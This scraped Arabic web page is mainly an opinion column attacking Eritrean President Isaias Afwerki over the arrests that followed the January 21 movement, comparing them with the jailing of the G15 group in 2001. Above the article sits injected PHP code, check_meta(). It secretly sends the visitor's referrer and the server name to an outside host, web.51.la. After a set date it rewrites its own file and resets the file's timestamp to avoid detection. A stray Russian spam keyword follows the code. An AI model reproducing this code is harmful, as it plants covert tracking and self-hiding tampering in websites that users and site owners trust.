check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } بعد حملات المداهمة والاعتقالات والإقامة الجبرية ..ماهي التهم التي ستلفق وأي المفردات سيختارها أفورقي
кремлевская диета

بعد حملات المداهمة والاعتقالات والإقامة الجبرية ..ماهي التهم التي ستلفق وأي المفردات سيختارها أفورقي

User Rating: / 1
PoorBest 

 

 

 

 

 

 

 

بعد حملات المداهمة والاعتقالات والإقامة الجبرية ..ماهي التهم التي ستلفق وأي المفردات سيختارها أفورقي..؟!

 

قاموس أفورقي مليئ بالكثير من المفردات التي ظل يتفنن في استعمالها مع كل حالة يواجه فيها نظامه أزمة داخلية يقودها رفاق دربه و أقرب المقربين إليه ، و قائمة المفردات هذه طويلة ..غير أن المفضل منها لدى أفورقي هي:

عملاء – خونة – مرتزقة – فاسدين – لاوطنيين – دعاة تفرقة ...الخ

و قد بدأ أفورقي إطلاق هذه التسميات منذ العام 1973م عندما ظهرت الحركات التي عرفت ب "المنكع" و "اليمين" ..ثم الصقت بمجموعة ال        G15       والتي وصفت بالعمالة لقوى خارجية ، وهي مجموعة ضمت عدد من الوزراء و الجنرالات و كوادر من الصفوف الأمامية التي ظلت تعمل معه و تأتمر بأوامره منذ المؤتمر الأول للجبهة الشعبية في مارس 1977م ، حتى جاءت اللحظة التي أدركت فيها بأن القائد الملهم الذي ظلت تمجده و تسعد بالتقرب منه ماهو إلا مريض سلطة تسقط المبادئ و تتبخر الشعارات أمام حبه للاستئثار بها ، و إنه لن يتورع في سبيل الحفاظ عليها – أي السلطة – عن القضاء حتى على من اخلصوا له وتفانوا في تنفيذ أوامره .

ومنذ سبتمبر 2001م مازالت هذه المجموعة و كل من تعاطف مع مطالبها قابعة في سجون أفورقي المنتشرة في كافة أنحاء إرتريا مع احتمال أن يكون البعض منهم قد انتقل إلى جوار ربه مثل محمود شريفو و عقبى أبرها و بطرس سلمون .

واليوم وبعد 12 عاما على حركة ال   G15     يعتقل أفورقي العشرات ممن يتهمهم بقيادة حركة 21 يناير . وبالعودة إلى قاموسه فإنه حتما سيختار إحدى المفردات أو عدد منها لإلصاقها بالمعتقلين الذين كانوا يتبوئون مناصب متقدمة جدا في الدولة والتنظيم الحاكم . وسيجد بكل تأكيد من يروج لتلك التهم و يفلسفها مثل (يماني قبراب) وغيره من نشطاء (خلية الطوارئ)، ولن تكون تلك التهم بأي حال من الأحوال بعيدة عن القوالب الجاهزة لمفردات التخوين، حيث سيطل علينا أفورقي بمفرداته المعهودة ليقول بأن هؤلاء المعتقلين هم خونة و عملاء ومأجورين و دعاة طائفية ..!

غير أن أفورقي و رغم كل ما يقال عن ذكائه الحاد وقدرته على التخطيط والتحليل و المناورة ، لم يدرك أن النار من مستصغر الشرر ، وأن غضب الشعوب و إن كبت مرة و أخرى و ثالثة تحت سطوة الجلاد و معتقلاته، فإنه في النهاية و بلاشك بركان عاتي تعجز كل وسائل القمع والترهيب من السيطرة عليه و إخماده . و نسي أيضا أو تناسى أن أجهزة أمن "بن علي" ، و "القذافي" ، و "مبارك" ، وصديقه "علي عبدالله صالح" كانت أقوى بكثير مما لديه من أجهزة أمنية واستخباراتية . و أن إمكاناتهم كانت أكبر بكثير مما عنده..

لكن الدكتاتور دائما لا يرى ولا يستمع إلا لنفسه ، و لا يتعظ بما يرى أو يسمع عما حدث لحكام جائرون مثله ، بل يتشبث أكثر فأكثر بأساليب البطش والإرهاب .

إن الطيبون وحدهم (والطيبون أنصاف موتى) هم الذين ستخدعهم فبركات أفورقي للتهم وإلصاقها بكل من يقف في وجهه و يقاوم حكمه التسلطي ، ولكن و بعد كل ما تعرض له الشعب الإرتري من تعسف و إرهاب وتكميم للأفواه لم يعد في إرتريا طيبون تنطوي عليهم فبركات أفورقي للتهم بتخوين الشرفاء .

إن مجموعة ال   G15  التي اعتقلها أفورقي في سبتمبر 2001م بتهمة العمالة لقوى خارجية لم تطالب بأكثر مما جاء في بيان حركة 21 يناير "القصيرة العمر" ، وكل فرد من أفراد مجموعة الG15   كان إما قائدا عسكريا بارزا أو كادرا من الصفوف الأولى أفنى زهرة شبابه في قيادة العمل الوطني و ترسيخ مبادئ النضال ، غير أن أفورقي وهو الذي لايخجل من سرقة إنجازات الآخرين و بطولاتهم الوطنية لم يتردد في إلصاق تلك التهم الكبيرة عليهم ، وقطعا سوف لن يتردد في إلصاق تهم مماثلة و ربما أكثر بشاعة على من اعتقلهم بتهمة تدبير أو مناصرة حركة 21 يناير .                                                  

اثنتى عشر عاما تفصل بين الحدثين (2001-2013م)، غير أن اسلوب التعامل معهما واحد: اعتقالات ،وتعذيب ،وتشويه ... فهل يعتقد أفورقي أنه انتصر و تمكن من اجتثاث روح التذمر والمعارضة بل والمقاومة في صفوف الحزب الذي يدعي أنه يحكم بإسمه ؟!

كلا ...إن نضال الشعوب ضد الأنظمة المتسلطة لا يموت بعدم نجاح هذه المحاولة أو تلك ، بل إنه يتجدد و يتعاظم مع كل محاولة تقمع وكل حركة تجهض ، حتى يتمكن في النهاية من دحرجة رأس الطاغية .

أما ثمن ذلك فمهما كان غاليا فإنه و بكل تأكيد أقل بآلاف المرات مما تطلبه مواجهة جحافل الاستعمار الإثيوبي و دحره ، لكنه ليس أقل أهمية من النضال من أجل التحرير ، لأنه يهدف إلى تخليص الشعب الإرتري من طاغية سرق انتصاره التاريخي ، وحرم الأجيال الجديدة من جني ثمار الانتصار الذي تحقق بنضالات وتضحيات أبائهم .

وبعد مضي أكثر من ثلاثة أسابيع على الحركة و بالتحديد في 14 فبراير وصف أفورقي الحركة بأنها "حدوتة" نفذها المفلسون وانتهت ..!! هكذا وبكل بساطة ، بينما الغليان يسري في طول البلاد وعرضها ...لا وألف لا ..بل هي بالعكس بداية النهاية لحكمه ، لكنه أراد أن يعطي جرعة معنويات للقلة من أنصاره و إيهامهم بأنه مازال ممسكا بكل الخيوط .. تماما مثل ماقال علي عبد الله صالح للمعارضة حينها :"فاتهم القطار ..فاتهم القطار" دون أن يدري بأن نفس القطار هو الذي سيحمله إلى مذبلة التأريخ ، و كما وصف القذافي المقاومة بال"جرذان" ليكون هو الجرذ الذي وجد يختبئ في المجاري ...

إنها طبيعة الطغاة ... و لن يطول الوقت الذي سيلحق فيه أفورقي بكل من سبقوه من أعداء الشعوب .

 

بقلم: محمد عيسى

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس